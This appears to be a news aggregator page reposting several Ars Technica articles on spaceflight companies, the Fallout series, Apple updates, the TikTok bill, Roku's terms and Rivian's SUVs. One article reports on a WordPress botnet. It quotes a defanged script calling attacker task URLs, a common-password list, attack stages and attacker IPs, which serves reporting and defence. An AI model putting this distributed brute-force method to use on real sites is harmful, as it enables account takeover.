Virgin Galactic is retiring its only operational spaceship. Over the last year, Virgin Galactic has proven it has the technical acumen to pull off monthly flights of its VSS Unity rocket plane, each carrying six people on a suborbital climb to the edge of space. But VSS Unity has never been profitable. It costs too much and takes too much time to reconfigure between flights. Virgin Galactic plans to fly the suborbital spaceship one more time before taking a hiatus from flight operations, Ars reports. This, along with layoffs announced last year, will allow the company to preserve cash while focusing on the development of a new generation of rocket planes, called Delta-class ships, designed to fly more often and with more people. Michael Colglazier, Virgin Galactic’s president and CEO, says the first of the Delta ships is on track to begin ground and flight testing next year, with commercial service targeted for 2026 based out of Spaceport America in New Mexico.

Bigger and faster… The Delta ships will each carry six customers in the spacecraft’s pressurized passenger cabin, compared to a maximum of four passengers on each VSS Unity flight. Virgin Galactic’s goal is to fly each Delta ship eight times per month, and the company will do this by eliminating many of the inspections required between each VSS Unity flight. The company is building a Delta ship structural test article to put through extensive checks on the ground, validating component life and cycle limits for major components of the vehicle. This will give engineers enough confidence to forego many inspections, according to Mike Moses, president of Virgin Galactic’s spaceline operations. Virgin Galactic has nearly $1 billion in cash or cash equivalents on its balance sheet, so it’s not in any immediate financial trouble. But the company reported just $7 million in revenue last year, with a net loss of $502 million. So, there’s an obvious motivation to make a change.

The easiest way to keep up with Eric Berger’s space reporting is to sign up for his newsletter, we’ll collect his stories in your inbox.

A new Japanese rocket will launch this weekend. A privately held Japanese company named Space One is set to shoot for orbit with the first flight of its Kairos rocket Friday night (US time), News on Japan reports. Space One will attempt to become the first Japanese private company to launch a rocket into orbit. Japan’s existing launch vehicles, like the H-IIA, the H3, and the Epsilon, were developed with funding from the Japanese space agency. But there is some involvement from the Japanese government on this flight. The Kairos rocket will launch with a small “quick response” spacecraft for the Cabinet Intelligence and Research Office, which is responsible for Japan’s fleet of spy satellites. Kairos, which is the Ancient Greek word for “timeliness,” is made up of three solid-fueled stages and a liquid-fueled upper stage. It can place a payload of up to 550 pounds (250 kilograms) into low-Earth orbit.

Winning hearts and minds… The Kairos rocket will take off from Space One’s Space Port Kii, located on a south-facing peninsula on the main Japanese island of Honshu. This new launch site is hundreds of miles away from Japan’s existing spaceports. Local businesses see the arrival of the space industry in this remote part of Japan as a marketing opportunity. A local confectionery store, not wanting to miss the opportunity to attract visitors, is selling manju shaped like rockets. There are two paid viewing areas to watch the launch, and a total of 5,000 seats sold out in just two days, according to News on Japan. (submitted by tsunam)

UK spaceport project to get 10 million pounds from government. The UK government has pledged 10 million pounds in funding to SaxaVord Spaceport in Scotland, European Spaceflight reports. This funding is sorely needed for SaxaVord, which slowed construction last year after its developer ran into financial trouble. In the last couple of months, SaxaVord raised enough money to resume payments to the contractors building the launch site. The UK government’s pledge of 10 million pounds for SaxaVord apparently is not quite a done deal. The UK’s science minister posted on X that the funding was “subject to due diligence.” SaxaVord will eventually have three launch pads, one of which has been dedicated to German launch startup Rocket Factory Augsburg. This company’s rocket, RFA ONE, is expected to be the first orbital launch from SaxaVord later this year.

The UK spaceport scene… The UK government, local entities, and private industry are making a pretty serious effort to bring orbital launches to the British Isles. Spaceport Cornwall became the first UK facility to host an orbital attempt last year with the failed launch of Virgin Orbit’s LauncherOne rocket, which was released from a carrier jet that took off from Cornwall. There are several vertical launch spaceports under construction or in the concept development phase. SaxaVord appears to be among those closest to reality, along with Sutherland spaceport, also in Scotland, to be used by the UK launch startup Orbex Space. (submitted by Ken the Bin)

Rocket Report: Starbase will expand into state park; another Japanese rocket Read More »

Ghouls, gulpers, and general mayhem abound in Fallout official trailer

culture, Entertainment, Fallout TV series, prime video, streaming television, Trailers, TV trailers / Mike M. / March 8, 2024

A story of haves and have-nots —

“Everyone wants to save the world. They just disagree on how.”

Jennifer Ouellette – Mar 7, 2024 11: 26 pm UTC

A Vault Dweller navigates a post-apocalyptic wasteland in Fallout, based on the bestselling gaming franchise.

Amazon Prime Video has dropped the full official trailer for Fallout, the streaming platform’s forthcoming post-apocalyptic sci-fi series. It’s based on the bestselling role-playing gaming franchise set in a satirical, 1950s-style future post-nuclear apocalypse. There’s plenty for gaming fans to be pleased about, judging by the trailer, but casting national treasure Walton Goggins (Justified) as a gunslinging Ghoul was quite simply a stroke of genius.

The first Fallout RPG was released in 1997, followed by several sequels and spinoffs. According to the game’s lore, modern civilization is destroyed in 2077 by a global nuclear war between the US and China. Survivors live in various underground vaults (fallout shelters). Each iteration of the game takes place somewhere across a post-apocalyptic US metro area and features a Vault Dweller—someone born and raised underground—as the protagonist. The first game takes place in 2161 and features a Vault Dweller from Vault 13, deep in the mountains of Southern California. The Vault Dweller must complete various missions to save the residents of Vault 13, which takes said protagonist to in-world places like Junktown; a merchant city called the Hub; and Necropolis, filled with Ghouls, i.e., humans badly mutated by exposure to nuclear radiation.

The series was announced in July 2020, with Westworld writers Jonathan Nolan and Lisa Joy serving as executive producers. In January 2022, it was revealed that Nolan would direct the first three episodes but that two other writers—Geneva Robertson-Dworet and Graham Wagner—would be the showrunners. Todd Howard, who directed several games in the franchise, is also an executive producer and has said the series is not an adaptation of any particular game, but it is set within the same continuity. Per the official premise:

Based on one of the greatest video game series of all time, Fallout is the story of haves and have-nots in a world in which there’s almost nothing left to have. Two hundred years after the apocalypse, the gentle denizens of luxury fallout shelters are forced to return to the irradiated hellscape their ancestors left behind—and are shocked to discover an incredibly complex, gleefully weird and highly violent universe waiting for them.

In addition to Goggins, Ella Purnell stars as a young Vault Dweller named Lucy, who must venture out into the wasteland on a mission to save her community in Vault 33. Aaron Moten plays a squire of the Brotherhood of Steel named Maximus; Kyle MacLachlan plays Lucy’s father, Hank, who is a Vault Overseer; Mike Doyle plays Mr. Spencer; Moises Arias plays Lucy’s brother, Norm; Michael Emerson plays an enigmatic wanderer named Wilzig; Johnny Pemberton plays Thaddeus; Cherien Dabis plays Birdie; Dale Dickey plays Ma June; Matty Cardarople plays Huey; Dave Register plays Chet; Rodrigo Luzzi plays Reg; and Annabel O’Hagan plays Steph. Sarita Choudhury and Leslie Uggams also appear in the series.

Nuclear weapons have devastated Los Angeles.

YouTube/Prime Video
Ella Purnell stars as a young Vault Dweller named Lucy.

YouTube/Prime Video
The Ghoul (Walton Goggins) is a mutated gunslinger and bounty hunter.

YouTube/Prime Video
Aaron Moten plays Maximus, a squire with the Brotherhood of Steel.

YouTube/Prime Video
Hey, it’s Michael Emerson of Lost fame, playing an enigmatic wanderer named Wilzig.

YouTube/Prime Video
Kyle MacLachlan plays Lucy’s father, Hank, a Vault Overseer.

YouTube/Prime Video
Sarita Choudhury looking fierce!

YouTube/Prime Video
A glimpse of the Ghoul when he was still Cooper Howard, trying to save his daughter from a nuclear blast.

YouTube/Prime Video
“I’m simply going to harvest your organs.”

YouTube/Prime Video
Look out for Gulpers!

YouTube/Prime Video
“There you are, you little killer.”

YouTube/Prime Video

A teaser dropped in January, chock-full of details instantly recognizable to longtime fans of the games. The new trailer opens with a pre-apocalypse Goggins in a snazzy suit, pitching “a veritable Camelot of the nuclear age”: underground vaults housing residential communities, “because if the worst should happen tomorrow, the world is gonna need you to build a better day after.” The worst does happen, of course, and we catch glimpses of a devastated Los Angeles in the wake of a nuclear war, including a ruined Santa Monica Pier and Griffith Observatory. Then we see Lucy preparing to leave her Vault, despite warnings that “it isn’t like the Vault out there; it’s big.”

Lucy first encounters a hardened Ma June, who laughs derisively when Lucy naively asks what’s happened in the last 200 years. (Frankly, she thought all the Vault Dwellers were dead.) Lucy also has several run-ins with the Ghoul formerly known as Cooper Howard. Pretty much everyone she meets seems to want her dead, although the robot Mr. Handy helpfully informs her it just wants to harvest her organs. Maximus gets his share of screen time, both in and out of full Brotherhood of Steel armor, and we get a glimpse of the Brotherhood’s airships, as well as a mutant monster called a Gulper. It’s a violent, chaotic wasteland, but apparently, “there’s always somebody behind the wheel.”

All episodes of Fallout will premiere on Prime Video on April 11, 2024.

Listing image by YouTube/Prime Video

Ghouls, gulpers, and general mayhem abound in Fallout official trailer Read More »

visionOS 1.1 tries to make Personas less unsettling, plus other Apple OS updates

Apple, macOS, Tech, tvos, visionOS, watchos / Mike M. / March 8, 2024

persona non grata —

Apple starts picking low-hanging fruit in visionOS; other OSes see minor improvements.

Andrew Cunningham – Mar 7, 2024 10: 50 pm UTC

Enlarge / A blurry, ghostly Persona in visionOS 1.0. They should at least look less bad in visionOS 1.1.

Samuel Axon

Apple has released a long list of medium-sized software updates for most of its devices today. The macOS Sonoma 14.4, watchOS 10.4, tvOS 17.4, and visionOS 1.1 updates are all available now, and most of them add at least one or two major features as they fix multiple bugs and patch security vulnerabilities.

The visionOS 1.1 release is the first major update for Apple’s newest operating system, and as our coverage of the headset has demonstrated, there’s still plenty of low-hanging fruit to fix. Most notably for people who are trying to use the headset for work meetings, Apple says that there have been multiple changes to the look of Personas, the 3D avatars that show up in your place when you’re video chatting with the Vision Pro on your face. The update improves “hair and makeup appearance,” “neck and mouth representation,” and “rendering of the eyes,” and while it’s clear that it’s an improvement over the 1.0 release of Personas, the core uncanniness still seems to be intact. The Persona feature is still labeled as a beta.

Apple has also made tweaks to the appearance and functionality of the headset’s virtual keyboard, improved the Virtual Display feature’s Mac connectivity, and added a handful of mobile device management features for IT administrators.

Apple’s headlining feature for macOS 14.4 is the addition of new Unicode 15.1 emoji, plus podcast transcriptions in the Apple Music app. It’s unclear whether this release enables multiple external displays for users of the $1,599 M3 MacBook Pro, a feature that Apple announced alongside the new M3 MacBook Airs.

Apple Watch owners can look forward to the resolution of one annoying bug I’ve run into a few times on my own watch: a bug that would make the screen act as though it was receiving touch input even when you weren’t touching it. Sometimes referred to as a “ghost touch” or “phantom touch” bug, the only way to get it to go away was to reboot the watch. I haven’t noticed the bug since I installed one of the later watchOS 10.4 betas a couple of weeks ago.

Version 17.4 of the HomePod operating system now allows users to set their preferred music service, so telling Siri to play music will automatically use whatever service you want instead of defaulting to Apple Music unless you specify. The tvOS 17.4 update doesn’t appear to include any particular features or fixes of note.

All of the new releases follow iOS 17.4 and iPadOS 17.4, which came out a few days ago with mostly minor changes unless you happened to live in the European Union. For European users, that update ushers in Apple’s first attempt at compliance with new regulations that require the company to allow the use of third-party app stores, alternate browsing engines, and sideloaded apps. These changes come with plenty of conditions and caveats, as Apple seeks to remain the ultimate arbiter of what software can and can’t run on iPhones and iPads.

visionOS 1.1 tries to make Personas less unsettling, plus other Apple OS updates Read More »

US lawmakers vote 50-0 to force sale of TikTok despite angry calls from users

Policy, tiktok bytedance / Mike M. / March 8, 2024

Divest or get out —

Lawmaker: TikTok must “sever relationship with the Chinese Communist Party.”

Jon Brodkin – Mar 7, 2024 10: 34 pm UTC

A large TikTok ad at a subway station. — Getty Images | Bloomberg

The House Commerce Committee today voted 50-0 to approve a bill that would force TikTok owner ByteDance to sell the company or lose access to the US market.

The Protecting Americans from Foreign Adversary Controlled Applications Act “addresses the immediate national security risks posed by TikTok and establishes a framework for the Executive Branch to protect Americans from future foreign adversary controlled applications,” a committee memo said. “If an application is determined to be operated by a company controlled by a foreign adversary—like ByteDance, Ltd., which is controlled by the People’s Republic of China—the application must be divested from foreign adversary control within 180 days.”

If the bill passes in the House and Senate and is signed into law by President Biden, TikTok would eventually be dropped from app stores in the US if its owner doesn’t sell. It also would lose access to US-based web-hosting services.

“If the application is not divested, entities in the United States would be prohibited from distributing the application through an application marketplace or store and providing web hosting services,” the committee memo said.

Chair: “CCP weaponizes applications it controls”

The bill was introduced on Tuesday and had 20 sponsors split evenly between Democrats and Republicans. TikTok urged its users to protest the bill, sending a notification that said, “Congress is planning a total ban of TikTok… Let Congress know what TikTok means to you and tell them to vote NO.”

Many users called lawmakers’ offices to complain, congressional staffers told Politico. “It’s so so bad. Our phones have not stopped ringing. They’re teenagers and old people saying they spend their whole day on the app and we can’t take it away,” one House GOP staffer was quoted as saying.

House Commerce Committee Chair Cathy McMorris Rodgers (R-Wash.) said that TikTok enlisting users to call lawmakers showed “in real time how the Chinese Communist Party can weaponize platforms like TikTok to manipulate the American people.”

“This is just a small taste of how the CCP weaponizes applications it controls to manipulate tens of millions of people to further their agenda. These applications present a clear national security threat to the United States and necessitate the decisive action we will take today,” she said before the vote.

The American Civil Liberties Union opposes the TikTok bill, saying it “would violate the First Amendment rights of hundreds of millions of Americans who use the app to communicate and express themselves daily.”

Bill sponsor: “It’s not a ban”

Bill sponsor Rep. Mike Gallagher (R-Wis.) expressed anger at TikTok for telling its users that the bill would ban the app completely, pointing out that the bill would only ban the app if it isn’t sold.

“If you actually read the bill, it’s not a ban. It’s a divestiture,” Gallagher said, according to Politico. Gallagher also said his bill puts the decision “squarely in the hands of TikTok to sever their relationship with the Chinese Communist Party.”

TikTok issued a statement calling the bill “an outright ban of TikTok, no matter how much the authors try to disguise it.” The House Commerce Committee responded to TikTok’s claim, calling it “yet another lie.”

While the bill text could potentially wrap in other apps in the future, it specifically lists the ByteDance-owned TikTok as a “foreign adversary controlled application.”

“It shall be unlawful for an entity to distribute, maintain, or update (or enable the distribution, maintenance, or updating of) a foreign adversary controlled application,” the bill says. An app would be allowed to stay in the US market after a divestiture if the president determines that the sale “would result in the relevant covered company no longer being controlled by a foreign adversary.”

US lawmakers vote 50-0 to force sale of TikTok despite angry calls from users Read More »

Attack wrangles thousands of web users into a password-cracking botnet

Biz & IT, botnets, password cracking, passwords, Security, websites / Mike M. / March 8, 2024

DISTRIBUTED PASSWORD CRACKING —

Ongoing attack is targeting thousands of sites, continues to grow.

Dan Goodin – Mar 7, 2024 10: 29 pm UTC

Attackers have transformed hundreds of hacked sites running WordPress software into command-and-control servers that force visitors’ browsers to perform password-cracking attacks.

A web search for the JavaScript that performs the attack showed it was hosted on 708 sites at the time this post went live on Ars, up from 500 two days ago. Denis Sinegubko, the researcher who spotted the campaign, said at the time that he had seen thousands of visitor computers running the script, which caused them to reach out to thousands of domains in an attempt to guess the passwords of usernames with accounts on them.

Visitors unwittingly recruited

“This is how thousands of visitors across hundreds of infected websites unknowingly and simultaneously try to bruteforce thousands of other third-party WordPress sites,” Sinegubko wrote. “And since the requests come from the browsers of real visitors, you can imagine this is a challenge to filter and block such requests.”

Like the hacked websites hosting the malicious JavaScript, all the targeted domains are running the WordPress content management system. The script—just 3 kilobits in size—reaches out to an attacker-controlled getTaskURL, which in turn provides the name of a specific user on a specific WordPress site, along with 100 common passwords. When this data is fed into the browser visiting the hacked site, it attempts to log in to the targeted user account using the candidate passwords. The JavaScript operates in a loop, requesting tasks from the getTaskURL, reporting the results to the completeTaskURL, and then performing the steps again and again.

A snippet of the hosted JavaScript appears below, and below that, the resulting task:

const getTaskUrl = 'hxxps://dynamic-linx[.]com/getTask.php';  const completeTaskUrl = 'hxxps://dynamic-linx[.]com/completeTask.php';  …

[871,"https://REDACTED","redacted","60","junkyard","johncena","jewish","jakejake","invincible","intern","indira","hawthorn","hawaiian","hannah1","halifax","greyhound","greene","glenda","futbol","fresh","frenchie","flyaway","fleming","fishing1","finally","ferris","fastball","elisha","doggies","desktop","dental","delight","deathrow","ddddddd","cocker","chilly","chat","casey1","carpenter","calimero","calgary","broker","breakout","bootsie","bonito","black123","bismarck","bigtime","belmont","barnes","ball","baggins","arrow","alone","alkaline","adrenalin","abbott","987987","3333333","123qwerty","000111","zxcv1234","walton","vaughn","tryagain","trent","thatcher","templar","stratus","status","stampede","small","sinned","silver1","signal","shakespeare","selene","scheisse","sayonara","santacruz","sanity","rover","roswell","reverse","redbird","poppop","pompom","pollux","pokerface","passions","papers","option","olympus","oliver1","notorious","nothing1","norris","nicole1","necromancer","nameless","mysterio","mylife","muslim","monkey12","mitsubishi"]

With 418 password batches as of Tuesday, Sinegubko has concluded the attackers are trying 41,800 passwords against each targeted site.

Sinegubko wrote:

Attack stages and lifecycle

The attack consists of five key stages that allow a bad actor to leverage already compromised websites to launch distributed brute force attacks against thousands of other potential victim sites.

Stage 1: Obtain URLs of WordPress sites. The attackers either crawl the Internet themselves or use various search engines and databases to obtain lists of target WordPress sites.

Stage 2: Extract author usernames. Attackers then scan the target sites, extracting real usernames of authors that post on those domains.

Stage 3: Inject malicious scripts. Attackers then inject their dynamic-linx[.]com/chx.js script to websites that they have already compromised.

Stage 4: Brute force credentials. As normal site visitors open infected web pages, the malicious script is loaded. Behind the scenes, the visitors’ browsers conduct a distributed brute force attack on thousands of target sites without any active involvement from attackers.

Stage 5: Verify compromised credentials. Bad actors verify brute forced credentials and gain unauthorized access to sites targeted in stage 1.

So, how do attackers actually accomplish a distributed brute force attack from the browsers of completely innocent and unsuspecting website visitors? Let’s take a look at stage 4 in closer detail.

Distributed brute force attack steps:

When a site visitor opens an infected web page, the user’s browser requests a task from the hxxps://dynamic-linx[.]com/getTask.php URL.

If the task exists, it parses the data and obtains the URL of the site to attack along with a valid username and a list of 100 passwords to try.

For every password in the list, the visitor’s browser sends the wp.uploadFile XML-RPC API request to upload a file with encrypted credentials that were used to authenticate this specific request. That’s 100 API requests for each task! If authentication succeeds, a small text file with valid credentials is created in the WordPress uploads directory.

When all the passwords are checked, the script sends a notification to hxxps://dynamic-linx[.]com/completeTask.php that the task with a specific taskId (probably a unique site) and checkId (password batch) has been completed.

Finally, the script requests the next task and processes a new batch of passwords. And so on indefinitely while the infected page is open.

As of Tuesday, the researcher had observed “dozens of thousands of requests” to thousands of unique domains that checked for files uploaded by the visitor browsers. Most files reported 404 web errors, an indication that the login using the guessed password failed. Roughly 0.5 percent of cases returned a 200 response code, leaving open the possibility that password guesses may have been successful. On further inspection, only one of the sites was compromised. The others were using non-standard configurations that returned the 200 response, even for pages that weren’t available.

Over a four-day span ending Tuesday, Sinegubko recorded more than 1,200 unique IP addresses that tried to download the credentials file. Of those, five addresses accounted for over 85 percent of the requests:

IP	%	ASN
146.70.199.169	34.37%	M247, RO
138.199.60.23	28.13%	CDNEXT, GB
138.199.60.32	10.96%	CDNEXT, GB
138.199.60.19	6.54%	CDNEXT, GB
87.121.87.178	5.94%	SOUZA-AS, BR

Last month, the researcher observed one of the addresses—87.121.87.178—hosting a URL used in a cryptojacking attack. One possibility for the change is that the earlier campaign failed because the malicious URL it relied on wasn’t hosted on enough hacked sites and, in response, the same attacker is using the password-cracking script in an attempt to recruit more sites.

As Sinegubko notes, the more recent campaign is significant because it leverages the computers and Internet connections of unwitting visitors who have done nothing wrong. One way end users can stop this is to use NoScript or another tool that blocks JavaScript from running on unknown sites. NoScript breaks enough sites that it’s not suitable for less experienced users, and even those with more experience often find the hassle isn’t worth the benefit. One other possible remedy is to use certain ad blockers.

Attack wrangles thousands of web users into a password-cracking botnet Read More »

After Astra loses 99 percent of its value, founders take rocket firm private

astra, Science, Space / Mike M. / March 8, 2024

What goes up must come down —

First you burn the cash, then comes the crash.

Eric Berger – Mar 7, 2024 10: 15 pm UTC

Image of a rocket launch. — Enlarge / Liftoff of Astra’s Rocket 3.0 from Cape Canaveral, Florida.

Astra’s long, strange trip in the space business is taking another turn. The company announced Thursday that it is going private at an extremely low valuation.

Four years ago, the rocket company, based in Alameda, California, emerged from stealth with grand plans to develop a no-frills rocket that could launch frequently. “The theme that really makes this company stand out, which will capture the imagination of our customers, our investors, and our employees, is the idea that every day we will produce and launch a rocket,” Astra co-founder Chris Kemp said during a tour of the factory in February 2020.

Almost exactly a year later, on February 2, 2021, Astra went public via a special purpose acquisition company (or SPAC). “The transaction reflects an implied pro-forma enterprise value for Astra of approximately $2.1 billion,” the company stated at the time. For a time, the company’s stock even traded above this valuation.

But then, rockets started failing. Only two of the seven launches of the company’s “Rocket 3” vehicle were successful. In August 2022, the company announced a pivot to the larger Rocket 4 vehicle. It planned to begin conducting test launches in 2023, but that did not happen. Accordingly, the company’s stock price plummeted.

Last November Kemp and the company’s co-founder, Adam London, proposed to buy Astra shares at $1.50, approximately double their price. The company’s board of directors did not accept the deal. Then, in late February, Kemp and London sharply cut their offer to take the company private, warning of “imminent bankruptcy” if the company doesn’t accept their new proposal. They offered $0.50 a share, well below the trading value of approximately $0.80 a share.

On Thursday, Astra said that this deal was being consummated.

“Astra Space, Inc. announced today that it has entered into a definitive merger agreement pursuant to which the acquiring entity has agreed, subject to customary closing conditions, to acquire all shares of Astra common stock not already owned by it for $0.50 per share in cash,” the company stated. The acquiring entity consists of Kemp, London, and other long-term investors.

Where Astra goes from here is anyone’s guess. Rocket 4 is likely months or years from the launch pad. It faces stiff competition not just from established small launch players such as Rocket Lab and Firefly but also from new entrants as well, including ABL Space and Stoke Space. Additionally, all of these small launch companies have been undercut in price by SpaceX’s Transporter missions, which launch dozens of satellites at a time on the Falcon 9 booster.

Additionally, Astra’s spacecraft engine business—acquired previously from Apollo Fusion—may or may not be profitable now, but there are questions about its long-term viability as well.

“I don’t fault management for seizing the opportunity to raise hundreds of millions of dollars by SPAC’ing, but a pre-revenue launch company without a proven rocket was probably never a good match for the public markets,” said Case Taylor, investor and author of the Case Closed newsletter.

Taylor added that he hopes that Astra spacecraft engines find a way to thrive in the new Astra, as the space industry values their performance. “I hope to see that diamond survive and thrive,” he said.

After Astra loses 99 percent of its value, founders take rocket firm private Read More »

“Disgraceful”: Messy ToS update allegedly locks Roku devices until users give in

arbitration, Policy, Roku, streaming, Tech, TVs / Mike M. / March 8, 2024

Show’s over —

Users are opted in automatically unless they write a letter to Roku by March 21.

Scharon Harding – Mar 7, 2024 8: 20 pm UTC

Enlarge / A promotional image for a Roku TV.

Roku customers are threatening to stop using, or to even dispose of, their low-priced TVs and streaming gadgets after the company appears to be locking devices for people who don’t conform to the recently updated terms of service (ToS).

This month, users on Roku’s support forums reported suddenly seeing a message when turning on their Roku TV or streaming device reading: “We’ve made an important update: We’ve updated our Dispute Resolution Terms. Select ‘Agree’ to agree to these updated Terms and to continue enjoying our products and services. Press to view these updated Terms.” A large button reading “Agree” follows. The pop-up doesn’t offer a way to disagree, and users are unable to use their device unless they hit agree.

Customers have left pages of complaints on Roku’s forum. One user going by “rickstanford” said they were “FURIOUS!!!!” and expressed interest in sending their reported six Roku devices back to the company since “apparently I don’t own them despite spending hundreds of dollars on them.”

Another user going by Formercustomer, who, I suspect, is aptly named, wrote:

So, you buy a product, and you use it. And they want to change the terms limiting your rights, and they basically brick the device … if you don’t accept their new terms. … I hope they get their comeuppance here, as this is disgraceful.

Roku has further aggravated customers who have found that disagreeing to its updated terms is harder than necessary. Roku is willing to accept agreement to its terms with a single button press, but to opt out, users must jump through hoops that include finding that old book of stamps.

To opt out of Roku’s ToS update, which primarily changes the “Dispute Resolution Terms,” users must send a letter to Roku’s general counsel in California mentioning: “the name of each person opting out and contact information for each such person, the specific product models, software, or services used that are at issue, the email address that you used to set up your Roku account (if you have one), and, if applicable, a copy of your purchase receipt.” Roku required all this to opt out of its terms previously, as well.

But the new update means that while users read this information and have their letter delivered, they’re unable to use products they already paid for and used, in some cases for years, under different “dispute resolution terms.”

“I can’t watch my TV because I don’t agree to the Dispute Resolution Terms. Please help,” a user going by Campbell220 wrote on Roku’s support forum.

Based on the ToS’s wording, users could technically choose to agree to the ToS on their device and then write a letter saying they’d like to opt out. But opting into an agreement only to use a device under terms you don’t agree with is counterintuitive.

Even more pressing, Roku’s ToS states that users only have “within 30 days of you first becoming subject to” Roku’s updated terms, which was February 20, to opt out. Otherwise, you’re opted in automatically.

Archived records of Roku’s ToS website seem to show the new ToS being online since at least August. But it was only this month that users reported that their TVs were useless unless they accepted the terms via an on-screen message. Roku declined to answer Ars Technica’s questions about the changes, including why it didn’t alert users about them earlier. But a spokesperson shared a statement saying:

Like many companies, Roku updates its terms of service from time to time. When we do, we take steps to make sure customers are informed of the change.

What Roku changed

Customers are criticizing Roku for aggressively pushing them to accept ToS changes. The updates focus on Roku’s terms for dispute resolution, which prevent users from suing Roku. The terms have long forced a described arbitration process for dispute resolution. The new ToS is more detailed, including specifics for “mass arbitrations.” The biggest change is the introduction of a section called “Required Informal Dispute Resolution.” It states that except for a small number of described exceptions (which include claims around intellectual property), users must make “a good-faith effort” to negotiate with Roku, or vice versa, for at least 45 days before entering arbitration.

Roku is also taking heat for using forced arbitration at all, which some argue can have one-sided benefits. In a similar move in December, for example, 23andMe said users had 30 days to opt out of its new dispute resolution terms, which included mass arbitration rules (the genetics firm let customers opt out via email, though). The changes came after 23andMe user data was stolen in a cyberattack. Forced arbitration clauses are frequently used by large companies to avoid being sued by fed-up customers.

Roku’s forced arbitration rules aren’t new but are still making customers question their streaming hardware, especially considering that there are rivals, like Amazon, Apple, and Google, that don’t force arbitration on users.

Based on comments in Roku’s forums, some users were unaware they were already subject to arbitration rules and only learned this as a result of Roku’s abrupt pop-up.

But with the functionality of already-owned devices blocked until users give in, Roku’s methods are questionable, and Roku may lose customers over it. Per an anonymous user on Roku’s forum:

I’m unplugging right now.

“Disgraceful”: Messy ToS update allegedly locks Roku devices until users give in Read More »

Rivian reveals three new, smaller electric SUVs: The R2, R3, and R3X

Cars, Rivian, Rivian R2, Rivian R3, Rivian R3X / Mike M. / March 8, 2024

no astromech droids were hurt in the making of this post —

The new EVs use Rivian’s new midsize platform, and R2 deliveries begin in 2026.

Jonathan M. Gitlin – Mar 7, 2024 7: 44 pm UTC

Rivian R2, R3, and R3X SUVs parked together — Enlarge / From left to right, the Rivian R2, Rivian R3, and Rivian R3X.

Rivian

Today in California, Rivian CEO and founder RJ Scaringe unveiled new additions to the electric vehicle startup’s model lineup. Details of the new R2 had leaked earlier this week, although not entirely accurately—the new smaller EV will start at $45,000 (not $47,000) when it goes on sale in 2026.

At first glance of the R2, you might be excused for thinking you’re looking at a Rivian R1S, for both SUVs share a lot of styling details—not just Rivian’s distinctive daylight running lights but also the overall shape of the vehicle. But the new car is shorter in both length (by 15.7 inches/400 mm) and height, and only offers two rows of seating, not three.

Convenience improvements include a pair of gloveboxes under the dashboard and a flashlight that’s stored in the door. At the back, the glass rear window can drop down to allow access to the cargo area. Both rows of seats fold flat, in case you want to camp in your car.

Rivian will build three different powertrain configurations of the R2: a single-motor, rear-wheel drive version, a twin-motor, all-wheel drive model, and a tri-motor option. Scaringe said that all three will have at least 300 miles (482 km) of range. The tri-motor R2 can accelerate from 0–60 mph in under three seconds.

The battery pack uses larger-format 4695 cylindrical cells, and Scaringe says that the R2 will go into production at the company’s first factory in Normal, Illinois. Reservations for the R2 opened today with a $100 deposit. Deliveries are scheduled for the first half of 2026.

The Rivian R2 looks a lot like the larger R1S.

Rivian
Rivian says it will save $2.5 billion by starting R2 production in Illinois instead of waiting for the plant in Georgia.

Rivian
A size comparison with the R1S.

Rivian
Here’s the R2 interior

Rivian
The addition of gloveboxes is a welcome touch.

Rivian
The R2’s seats all fold flat.

Rivian
A look at the R2 door cards.

Rivian
The center console has plenty of cubbies.

Rivian
Rivian plans a range of R2 accessories, including a camp kitchen and a tent.

Rivian

Although details on the R2 had already leaked, the company prevented that from happening for another new model, introduced by Scaringe with a Steve Jobs-like “one more thing…” toward the end of the presentation. In fact, it was two new things: a pair of even smaller electric crossovers called the R3 and R3X.

Like the R2, these two new models use the same new midsize platform (as opposed to the larger platform that underpins the R1S, R1T, and the Rivian Delivery Van). The R3 and R3X keep Rivian’s distinctive light signature but eschew copying the larger SUV’s silhouette for a shape that looks more like a Fiat Panda or Lada Niva, at least to this observer.

The R3 has a wheelbase that is 5 inches (125 mm) shorter than the R2 but will also be offered with the same three choices of powertrains and have more than 300 miles of range. The R3X is much like the R3 but with wheel arch extensions and a rear spoiler.

Like the bigger R1 and R2, the R3 and R3X have a cargo frunk up front. Similar to the R2, the front and rear seats fold flat. The rear hatch glass opens independently of the hatch, which allows you to carry larger payloads.

The R3 and R3X will be built at Rivian’s new factory in Georgia, but for now, we can’t tell you when deliveries will start or how much you’ll have to pay to have one in your driveway or garage.

The same adorable face but in a small new package—the Rivian R3.

Rivian
The glass in the hatch opens independently for large loads like a surfboard.

Rivian
I’ll be honest, if Rivian was taking R3 deposits today I’d have sent in my $100.

Rivian
The Rivian R3X is off-road coded.

Rivian
Rivian
A look at the Rivian R3 interior.

Rivian
The R3’s back seat will be a bit more cramped than the R2.

Rivian
The R3’s door card, which also has a flashlight stored in it.

Rivian
The R3X interior has the same layout as the R3 but with different materials.

Rivian
The rear seats in the R3 and R3X are split 40: 20: 40.

Rivian

DC fast-charging for all three models should take under 30 minutes to charge from 10–80 percent, Rivian tells us, and the cars will feature native J3400 charging ports. We also learned that later this month, existing Rivian owners will gain access to the Tesla Supercharger network, although these EVs will need to use a CCS1-J3400 adapter.

“I have never been more excited to launch new products—R2 and R3 are distinctly Rivian in terms of performance, capability and usability yet with pricing that makes them accessible to a lot of people. Our design and engineering teams are extremely focused on driving innovation into not only the product features but also our approach to manufacturing to achieve dramatically lower costs,” said Scaringe. “R2 provides buyers starting in the $45,000 price range with a much-needed choice with a thoroughly developed technology platform that is bursting with personality. I can’t wait to get these to customers.”

Rivian reveals three new, smaller electric SUVs: The R2, R3, and R3X Read More »